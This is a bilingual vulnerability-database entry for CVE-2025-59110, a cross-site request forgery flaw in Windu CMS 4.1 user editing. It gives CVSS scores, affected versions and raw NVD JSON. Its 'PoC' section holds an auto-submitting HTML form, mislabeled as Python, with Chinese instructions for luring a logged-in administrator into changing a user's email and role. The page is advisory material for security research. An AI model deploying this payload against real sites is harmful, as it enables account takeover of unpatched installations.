Security Vulnerability Report
中文
CVE-2025-59110 CVSS 6.5 MEDIUM

CVE-2025-59110

Published: 2025-11-18 15:16:33
Last Modified: 2025-12-05 13:16:03
Source: [email protected]

Description

Windu CMS is vulnerable to Cross-Site Request Forgery in user editing functionality. Implemented CSRF protection mechanism can be bypassed by using CSRF token of other user. It is worth noting that the registration is open and anyone can create an account. Only version 4.1 was tested and confirmed as vulnerable. This issue was fixed in version 4.1 build 2250.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:* - VULNERABLE
Windu CMS 4.1 (所有版本 < 4.1 build 2250)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for Windu CMS 4.1 User Edit --> <html> <body> <h1>Windu CMS 4.1 CSRF Attack PoC</h1> <p>诱骗已登录管理员访问此页面以修改用户信息</p> <form action="http://target-site.com/index.php?do=user/edit/[TARGET_USER_ID]" method="POST" id="csrfForm"> <input type="hidden" name="csrf_token" value="[ATTACKER_STOLEN_TOKEN]"> <input type="hidden" name="username" value="admin"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="role" value="admin"> <input type="hidden" name="submit" value="1"> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this text, the attack failed.</p> </body> </html> <!-- 说明: 1. 攻击者首先注册账户获取有效CSRF token 2. 将获取的token替换[ATTACKER_STOLEN_TOKEN] 3. 将[TARGET_USER_ID]替换为目标用户ID 4. 将target-site.com替换为实际目标URL 5. 诱骗管理员访问此页面即可触发CSRF攻击 -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59110", "sourceIdentifier": "[email protected]", "published": "2025-11-18T15:16:32.620", "lastModified": "2025-12-05T13:16:03.017", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Windu CMS is vulnerable to Cross-Site Request Forgery in user editing functionality. Implemented CSRF protection mechanism can be bypassed by using CSRF token of other user. It is worth noting that the registration is open and anyone can create an account.\n\nOnly version 4.1 was tested and confirmed as vulnerable.\nThis issue was fixed in version 4.1 build 2250."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "614EBC19-889B-4FC0-8937-C52F415D4835"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/11/CVE-2025-59110", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://windu.org/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.